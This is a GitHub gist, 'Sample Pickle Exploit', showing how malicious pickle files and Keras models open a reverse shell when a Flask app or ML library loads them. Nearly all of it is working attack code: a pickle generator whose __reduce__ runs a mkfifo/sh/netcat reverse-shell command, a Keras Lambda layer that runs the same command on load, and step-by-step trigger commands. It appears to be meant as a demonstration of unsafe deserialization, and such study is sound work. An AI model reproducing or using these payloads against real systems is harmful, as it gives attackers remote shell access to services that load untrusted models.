Skip to content

Instantly share code, notes, and snippets.

@joshualat
Last active July 19, 2022 14:06
Show Gist options
  • Save joshualat/a3fdfa4d49d1d6725b1970133d06866b to your computer and use it in GitHub Desktop.
Save joshualat/a3fdfa4d49d1d6725b1970133d06866b to your computer and use it in GitHub Desktop.
Sample Pickle Exploit

Open a new tab

nc -nvl 14344

Open a new tab to run the malicious pickle generator scripe

python generate_pickle.py

Open a new tab to run the Flask app

flask run

Trigger the endpoint

curl -d "x=1" http://127.0.0.1:5000/predict

Similarly with PyTorch

import torch

torch.load("model.pkl")
import pickle
from flask import Flask, request
app = Flask(__name__)
def load_model():
model = None
with open("model.pkl", "rb") as f:
model = pickle.load(f)
return model
@app.route("/predict", methods=["POST"])
def predict():
model = load_model()
# get input value from request
# perform prediction
# return prediction
return '', 200
rm /tmp/JLTEH; mkfifo /tmp/JLTEH; cat /tmp/JLTEH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/JLTEH
import tensorflow
from tensorflow.keras.layers import Input, Lambda, Softmax
from tensorflow.keras.models import Model
from tensorflow.keras.optimizers import Adam
def custom_layer(tensor):
PAYLOAD = 'rm /tmp/FCMHH; mkfifo /tmp/FCMHH; cat /tmp/FCMHH | /bin/sh -i 2>&1 | nc 127.0.0.1 14344 > /tmp/FCMHH'
__import__('os').system(PAYLOAD)
return tensor
input_layer = Input(shape=(10), name="input_layer")
lambda_layer = Lambda(custom_layer, name="lambda_layer")(input_layer)
output_layer = Softmax(name="output_layer")(lambda_layer)
model = Model(input_layer, output_layer, name="model")
model.compile(optimizer=Adam(lr=0.0004), loss="categorical_crossentropy")
model.save("model.h5")
import pickle
import os
import random
import string
def generate_random_string():
list_of_chars = random.choices(
string.ascii_uppercase,
k=5)
return ''.join(list_of_chars)
def generate_payload(ip="127.0.0.1", port="14344"):
r = "/tmp/" + generate_random_string()
commands = [
f'rm {r}; mkfifo {r}; cat {r}',
f'/bin/sh -i 2>&1',
f'nc {ip} {port} > {r}'
]
return ' | '.join(commands)
PAYLOAD = generate_payload()
class SampleClass:
def __reduce__(self):
cmd = (PAYLOAD)
return os.system, (cmd,)
def generate_pickle():
obj = SampleClass()
with open("model.pkl", "wb") as f:
model = pickle.dump(obj, f)
if __name__ == '__main__':
generate_pickle()
from tensorflow.keras.models import load_model
load_model("model.h5")
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment